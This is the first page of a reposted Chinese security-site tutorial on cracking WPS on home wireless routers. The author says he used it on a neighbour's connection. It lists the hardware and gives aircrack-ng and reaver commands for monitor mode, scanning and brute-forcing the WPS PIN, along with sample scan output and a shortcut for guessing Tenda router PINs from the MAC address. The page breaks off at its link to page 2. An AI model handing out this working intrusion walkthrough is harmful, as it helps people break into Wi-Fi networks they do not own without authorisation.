欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

无线安全之WPS

来源:本站转载 作者:佚名 时间:2013-11-17 TAG: 我要投稿

 wireless_attch_wps

最近在淘宝入手了一套8187芯片主板与14DB平板天线,用我的老爷笔记本做了下测试,结果测试效果还行,邻居的电信带宽速度也不错。

具体涉及的无线安全技术:主要是扫描开放有WPS功能的无线路由器,然后通过开源软件reaver来暴力破解pin码,最后通过pin来得到无线路由器WPA-PSK密码。前面暴力破解时间稍微比较长,后面这个过程可以说是秒杀。

配置

基本配置就如下所示,出了笔记本电脑外其它就价格也就RMB120块左右。

8187 芯片主板
14DB平板天线
3米 USB2.0延长线
安装Linux 系统的笔记本

话说14DB的平板天线看起来还是很霸气的,关于事事如意18DB天线也测试了下效果差不多,不知道是不是楼层的问题。

准备工作

安装驱动和工具(aircrack-ng和reaver),Ubuntu可以直接APT,其它系统可以需要下载源码安装,不过都很简单。

sudo apt-get install aircrack-ng 
sudo apt-get install reaver

破解过程

1、开启网卡的监控模式

sudo airmon-ng start wlan0

2、扫描附近的无线信号

sudo airodump-ng mon0

在这个过程中你会看到很多无线信号,主要观察几个参数 :PWR(信号强度,越小越好),MB(需要为54e.)。

BSSID      PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
68:53:21:E3:30:BE  -1 0 0 0 143 -1 <length: 0>
BC:D1:77:25:76:84 -47 50 2 0 1 54e WPA2 CCMP PSK fire
C8:3A:35:55:42:E8 -44 35 0 0 8 54e WPA CCMP PSK Tenda_5542E8
1C:FA:68:1C:7D:D6 -56 30 0 0 6 54e. WPA2 CCMP PSK hool
A8:15:4D:83:6A:24 -51 29 5 0 11 54e. WPA2 CCMP PSK show
F4:EC:38:3D:02:B6 -53 19 0 0 1 54e. WPA2 CCMP PSK

这里特别强调下Tenda路由器可以秒杀,其路由器的MAC前面地址为: C8:3A:35,后面6为是pin的前8位的十六进制。因此只需要复制MAC地址的后6位,然后转为十进制,就可以得到PIN码的前面的数字了。

3、破解PIN码

sudo reaver -i mon0 -b MAC -a -S -vv -d 0 -c 1

知道PIN前面的数字的时候可以用下面这个命令:

sudo reaver -i mon0 -b MAC -a -S -vv -d 0 -c 6 -p 40000

-b 后面跟MAC地址

-c 频道,从扫描结果看

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载